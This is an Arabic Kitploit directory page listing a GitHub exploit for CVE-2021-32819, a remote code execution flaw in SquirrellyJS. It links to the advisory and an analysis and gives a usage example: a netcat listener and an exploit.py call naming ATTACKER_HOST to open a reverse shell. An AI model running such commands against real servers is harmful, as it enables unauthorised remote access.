Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-32819 — SquirrellyJS يخلط بيانات القالب النقية مع خيارات تكوين المحرك عبر واجهة برمجة تطبيقات Express render. عن طريق الكتابة فوق خيارات التكوين الداخلية، قد يتم تشغيل تنفيذ الأكواد عن بُعد في التطبيقات النهائية. | Kitploit
أدوات/GitHubGitHub/abady0x1/cve-2021-32819
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأداة الوصول عن بعد
GitHubabady0x1/cve-2021-32819

CVE-2021-32819

SquirrellyJS يخلط بيانات القالب النقية مع خيارات تكوين المحرك عبر واجهة برمجة تطبيقات Express render. عن طريق الكتابة فوق خيارات التكوين الداخلية، قد يتم تشغيل تنفيذ الأكواد عن بُعد في التطبيقات النهائية.

عرض المستودع
1012منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-32819

CVE-2021-32819 : SquirrellyJS يخلط بين بيانات القالب الخالصة وخيارات تكوين المحرك من خلال واجهة برمجة تطبيقات العرض Express. من خلال الكتابة فوق خيارات التكوين الداخلية، قد يتم تشغيل تنفيذ التعليمات البرمجية عن بُعد في التطبيقات النهائية.

المصدر

https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/

التحليل

https://blog.diefunction.io/vulnerabilities/ghsl-2021-023

squirrelly

v8.0.0 >= v8.0.8 تنفيذ التعليمات البرمجية عن بُعد

البيئة

Ubuntu 20.04.1

مثال

root@kitploit:~
nc -lvp 443

python3 exploit.py http://example.com/  ATTACKER_HOST 443

إثبات المفهوم

تنزيل الأداة